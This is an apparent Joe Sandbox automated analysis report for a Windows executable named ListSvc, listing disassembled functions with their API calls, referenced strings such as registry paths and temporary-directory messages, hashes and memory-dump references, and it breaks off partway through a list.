Opcode ID: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
Instruction ID: e2cc099636b1ff89dc3d2fe7d8b391202ea9480b4d839bd65efd70e323d436a8
Opcode Fuzzy Hash: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
Instruction Fuzzy Hash: 60316F20B006429AD720AB7A9484B2777E66B44328F14053FE449E62E3D7BCDCC4C75D

Uniqueness

Uniqueness Score: -1.00%

Function 00409EF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00409F28
FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009

Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0

Strings

MZP, xrefs: 00409FCF

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
API String ID: 3490077880-2889622443
Opcode ID: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
Instruction ID: 07d30fd0877b4d42c88f7c1dd8669400ca79996a2773cdc214a63d44a36a60ff
Opcode Fuzzy Hash: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
Instruction Fuzzy Hash: C4316E20A007828ADB21AB769494B2777E26F15318F14487FE049E62E3D7BCDCC4C71E

Uniqueness

Uniqueness Score: -1.00%

Function 004785F8, Relevance: 6.1, APIs: 4, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoW.USER32 ref: 00478619
UnregisterClassW.USER32 ref: 00478642
RegisterClassW.USER32 ref: 0047864C
SetWindowLongW.USER32 ref: 00478697

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
Instruction ID: 194e1b82028893281538589df9a22bcce55ada3cdaffe31495447ecbac098301
Opcode Fuzzy Hash: d27d5fbb6baed82f6e21188927ffafad82830e40efd9868f5115729f59a844e9
Instruction Fuzzy Hash: D501C4716452057BCB10EB98EC85FDF739EE758314F10811AF508E7391CA39E9418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 006ACABC, Relevance: 6.0, APIs: 4, Instructions: 34
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 006ACADC
GetLastError.KERNEL32 ref: 006ACAE6
GetTickCount.KERNEL32 ref: 006ACAF0
Sleep.KERNEL32(00000032), ref: 006ACB00

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLast$CountSleepTick
String ID:
API String ID: 2227064392-0
Opcode ID: e92de128a85ff465f893565a8a936560ef2ccf8464eadd77d591fb41e4d7bbbe
Instruction ID: 650aecd8dda8324acb9ef1ef12543e615cdaddf0aa48ac4ca6bdf88ba774c7be
Opcode Fuzzy Hash: e92de128a85ff465f893565a8a936560ef2ccf8464eadd77d591fb41e4d7bbbe
Instruction Fuzzy Hash: 2AE02B7234838094D725356E58864BE8D5ACFC3376F280A3FF0C4D2182C4058D85C576

Uniqueness

Uniqueness Score: -1.00%

Function 006AE3C8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendNotifyMessageW.USER32(0006001E,00000496,00002711,-00000001), ref: 006AE618

Strings

(\m, xrefs: 006AE404, 006AE418, 006AE50E, 006AE527, 006AE540, 006AE559, 006AE572, 006AE5BD, 006AE5D3, 006AE5E9
MS PGothic, xrefs: 006AE46C, 006AE47F

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: MessageNotifySend
String ID: (\m$MS PGothic
API String ID: 3556456075-219475269
Opcode ID: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
Instruction ID: c4b29eded5dd607060819086577383edb80d612be209ecb45f272f1b38c29540
Opcode Fuzzy Hash: 5872f3e2574d28b85d9b45cc1f1968af4813a13433e0e2fba3505ffcfb2f636e
Instruction Fuzzy Hash: 295150347011448BC700FF69D88AE5A77E3EB9A308B54557AF4049F366CA7AEC42CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0060D530, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D578
GetLastError.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D581

Strings

.tmp, xrefs: 0060D561

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: e93f63a39784aa6470c6da5dd94180a139e9ced73c7f02cb7c8ee81622348e6f
Instruction ID: 90e89e80a8d15c693f6baa1c53929b57ef88e13b94ce627ec608a80cc6a9e7e5
Opcode Fuzzy Hash: e93f63a39784aa6470c6da5dd94180a139e9ced73c7f02cb7c8ee81622348e6f
Instruction Fuzzy Hash: F4219975A502089FDB05EBE4CC51EEEB7B9EB88304F10457AF901F3381DA75AE058B64

Uniqueness

Uniqueness Score: -1.00%

Function 006ACB10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 006ACB58

Strings

Failed to remove temporary directory: , xrefs: 006ACB7A
bm, xrefs: 006ACB3A

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CountTick
String ID: Failed to remove temporary directory: $bm
API String ID: 536389180-2673898769
Opcode ID: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
Instruction ID: 78e05ed3d0f448852bd59dbbb99a4cbd83d81d15065c7e17e95d6b7c04c680f0
Opcode Fuzzy Hash: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
Instruction Fuzzy Hash: 9401D430610704AAD751FB75EC47F9A73979B46B10F51046AF500A72D2D7769C40CA28

Uniqueness

Uniqueness Score: -1.00%

Function 006AC180, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AC56B,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006), ref: 006AC1E2

Strings

RegisteredOwner, xrefs: 006AC1BF
RegisteredOrganization, xrefs: 006AC1D1

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Close
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 3535843008-1113070880
Opcode ID: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
Instruction ID: ca4fc0b31771868649da923643cba903dbb3fbd6f1f7080981924f9495942079
Opcode Fuzzy Hash: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
Instruction Fuzzy Hash: E8F09030744108AFE700EAD4DC56BAA7B9FE787714F60106AF1008BB82C630AE00CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040952E, Relevance: 4.6, APIs: 3, Instructions: 83COMMON

Download Yara Rule

APIs

UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 0040959A
UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00009530), ref: 004095D7
RtlUnwind.KERNEL32(?,?,Function_00009530,00000000,?,?,Function_00009530,?), ref: 00409602

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ExceptionFilterUnhandled$Unwind
String ID:
API String ID: 1141220122-0
Opcode ID: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
Instruction ID: e545f85d7011ee45bc6c766d7eccadc728dc4c1814e3ea314169116c21f0ec9d
Opcode Fuzzy Hash: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
Instruction Fuzzy Hash: 8C3180B1604200AFD720DB15CC84F67B7E5EB84714F14896AF408972A3CB39EC84CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00414DA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00414DDF

Strings

TWindowDisabler-Window, xrefs: 00414DDD

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CreateWindow
String ID: TWindowDisabler-Window
API String ID: 716092398-1824977358
Opcode ID: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
Instruction ID: a9fb6cbc93b7d8fca137cee03195aa1e05eb631c50c99d8148995e53eb0ae486
Opcode Fuzzy Hash: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
Instruction Fuzzy Hash: 7BF092B2604158BF9B80DE9DDC81EDB77ECEB4D2A4B05416AFA0CE3201D634ED118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 006AC0D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B813A,?,006AC32E,00000000,006AC586,?,00000000,00000000), ref: 006AC115

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 006AC0E7

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows\CurrentVersion
API String ID: 47109696-1019749484
Opcode ID: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
Instruction ID: 9fe961e3a0f1dd2c49f778430c2599f74e8698f8579e7211867226b13b49c2b0
Opcode Fuzzy Hash: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
Instruction Fuzzy Hash: 8FF082317042186BEA04B69E6C52BAEA69D9B86764F60007EF608D7283D9A49E0107A9

Uniqueness

Uniqueness Score: -1.00%

Function 005C7A14, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 005C7A2E

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Open
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 71445658-1109908249
Opcode ID: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
Instruction ID: f7a531ddb9cdcc56bc9141aac83b8570c2bea4ceb2af7b348951fcc1ebd06380
Opcode Fuzzy Hash: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
Instruction Fuzzy Hash: C3D0C97291022C7B9B009ED9DC41EFB7B9DEB19360F40845AFD0897100C2B4EDA18BF4

Uniqueness

Uniqueness Score: -1.00%

Function 0060DCC8, Relevance: 3.2, APIs: 2, Instructions: 192fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(000000FF,?,00000000,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001), ref: 0060DECE
FindClose.KERNEL32(000000FF,0060DEF9,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001,00000001), ref: 0060DEEC

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
Instruction ID: 99f5a77a41558a3604df8ac4250e6fc047523390e4335a570d25b15aca54e13b
Opcode Fuzzy Hash: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
Instruction Fuzzy Hash: CD81B0309442899EDF15DFA5C845BEFBBB6AF45304F1482AAE844673C1C7349F45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 005C77F4, Relevance: 3.1, APIs: 2, Instructions: 112registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670,00000000), ref: 005C7830
RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,005C792A,?,006AE670), ref: 005C789E

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
